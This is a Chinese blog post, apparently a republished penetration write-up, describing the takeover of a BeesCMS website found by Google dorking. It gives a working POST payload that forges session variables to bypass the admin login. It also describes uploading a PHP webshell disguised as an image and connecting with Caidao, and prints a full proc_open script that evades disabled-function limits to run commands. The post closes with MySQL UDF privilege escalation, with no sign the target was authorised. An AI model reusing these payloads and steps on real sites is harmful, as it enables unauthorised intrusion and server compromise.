首页 » Web前端 » php权限符技巧_实战1记一次提至Administrator权限实战

php权限符技巧_实战1记一次提至Administrator权限实战

访客 2024-12-09 0

扫一扫用手机浏览

文章目录 [+]

择要:这是一次挖掘cms通用漏洞时创造的网站,技能含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收成。

0x01 进入后台

在通过googlehack语法挖掘beescms时创造了这个站点

php权限符技巧_实战1记一次提至Administrator权限实战

利用网上的payload,在/mx_form/mx_form.php?id=12页面利用hackbarPOST以下数据_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后访问/admin便可以直接进入后台

php权限符技巧_实战1记一次提至Administrator权限实战
(图片来自网络侵删)
0x02 拿shell

进入后台后在‘添加产品模块’处探求到了上传点

考试测验上马,但提示‘上传图片格式禁绝确’,于是上传图片马抓包,在repeater里变动后缀为php,然后go

根据回显没有看出是否上传成功,但也没说失落败。
经由探求在‘上传图片管理’处找到

点击图片创造解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却创造实行命令失落败,可能远程启用了安全模式

经由在网上一番查找得出:要找到未禁用的php实行函数。
先上传了一个查看phpinfo的脚本,找到已禁用的函数

创造proc_open函数未被禁用,于是找到如下php脚本<?php $descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符 0=>array('pipe','r'), //STDIN 1=>array('pipe','w'),//STDOUT 2=>array('pipe','w') //STDERROR ); $handle=proc_open('whoami',$descriptorspec,$pipes,NULL); //$pipes中保存的是子进程创建的管道对应到 PHP 这一真个文件指针($descriptorspec指定的) if(!is_resource($handle)){ die('proc_open failed'); } //fwrite($pipes[0],'ipconfig'); print('stdout:<br/>'); while($s=fgets($pipes[1])){ print_r($s); } print('===========<br/>stderr:<br/>'); while($s=fgets($pipes[2])){ print_r($s); } fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($handle);?>

上传后可以实行命令,成功绕过安全模式

0x04 提权

上图可以看出只是iis权限,能做的事很局限,以是要想办法提权。

菜刀中虽然不能实行命令,但是可以查看文件,于是找到了数据库配置文件

创造是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

登录后导出udf便可以实行命令了

提权成功,但是不可以添加用户,也不能开3389。

php限定命令实行绕过思路

参考链接:https://www.cnblogs.com/R4v3n/articles/9081202.html

标签:

相关文章